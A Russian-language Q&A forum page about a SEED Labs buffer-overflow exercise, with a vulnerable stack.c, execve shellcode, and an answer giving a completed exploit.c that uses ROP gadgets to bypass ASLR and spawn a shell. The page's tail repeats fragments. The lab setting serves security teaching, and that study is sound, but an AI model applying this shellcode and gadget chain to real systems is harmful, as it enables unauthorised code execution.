Question

В этой лаборатории у меня есть exploit.c, stack.c и call_shellcode.c. Stack.c был изменен, поэтому он распечатывает адрес буфера и адрес ebp. Я запускаю это на виртуальной машине, Ubuntu 12.04 32 бит.

Мне нужно использовать уязвимую программу stack.c и поместить код в exploit.c, чтобы создать оболочку при запуске моего исполняемого файла стека. Любая помощь приветствуется.

Stack.c внизу. Извините за неверный отступ, фактический код имеет правильный отступ.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

unsigned long int sp;


int cp(char *str)
{
//    unsigned long int sp;
char buffer[12];
asm("movl %%ebp, %0" : "=r" (sp));
printf("$ebp is 0X%lx\n",sp);

strcpy(buffer, str);

printf("Buffer is at address %p\n",(void*)(&buffer));
return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;

badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
cp(str);

printf("Returned Properly\n");
return 1;
}

И exploit.c внизу.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0"             /* xorl    %eax,%eax              */
"\x50"                 /* pushl   %eax                   */
"\x68""//sh"           /* pushl   $0x68732f2f            */
"\x68""/bin"           /* pushl   $0x6e69622f            */
"\x89\xe3"             /* movl    %esp,%ebx              */
"\x50"                 /* pushl   %eax                   */
"\x53"                 /* pushl   %ebx                   */
"\x89\xe1"             /* movl    %esp,%ecx              */
"\x99"                 /* cdq                            */
"\xb0\x0b"             /* movb    $0x0b,%al              */
"\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */ 


/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

Я запустил gdb для моего исполняемого файла стека, скомпилированного с помощью gcc -o stack -z execstack -fno-stack-protector stack.c, и обнаружил, что буфер находится по адресу 0xbffff134 и ebp по адресу 0xbffff148. Я понимаю, что должен как-то найти свой обратный адрес и сделать так, чтобы мои данные были по этим адресам? Нужна некоторая помощь относительно переполнения буфера с этим назначением, пожалуйста.

ccxxshow · Answer 1 · 26 марта 2019

Вам необходимо обойти ASLR, см. Ссылку ниже

https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-iii/

Найти гаджет:

pop ebx; ret;                                         // construct ebx value
add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret;   // construct eax value
add dword [ebx+0x0804A028], esp; call dword [0x08049F1C+eax*4]

построение значений eax и ebx
записать значение ESP в память 0804a020, а затем выполнить его

Модифицированный эксплойт.c:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
    ;

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;
    int i;
    unsigned int *val = (unsigned int*)buffer;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    val[6] = 0x08048378;       /* pop ebx; ret; */
    val[7] = 0xaaa9a03c;       /* ebx */
    for(i=8; i<16; i++)        
        val[i] = 0x0804847c;   /* add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; */
    val[16] = 0x08048378;      /* pop ebx; ret; */
    val[17] = 0xfffffff8;      /* ebx */
    val[18] = 0x08048462;      /* add dword [ebx+0x0804A028], esp; */
                               /* call dword [0x08049F1C+eax*4] */
    memcpy(&val[19], shellcode, sizeof(shellcode));

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}

Переполнение буфера, модифицированный вопрос Seedlab?

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Вам необходимо обойти ASLR, см. Ссылку ниже

Найти гаджет:

Модифицированный эксплойт.c:

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Переполнение буфера, модифицированный вопрос Seedlab?

Пожалуйста, войдите или зарегистрируйтесь чтобы ответить на этот вопрос.

1 Ответ

Вам необходимо обойти ASLR, см. Ссылку ниже

Найти гаджет:

Модифицированный эксплойт.c:

Пожалуйста, войдите или зарегистрируйтесь что бы добавить комментарий.

Похожие темы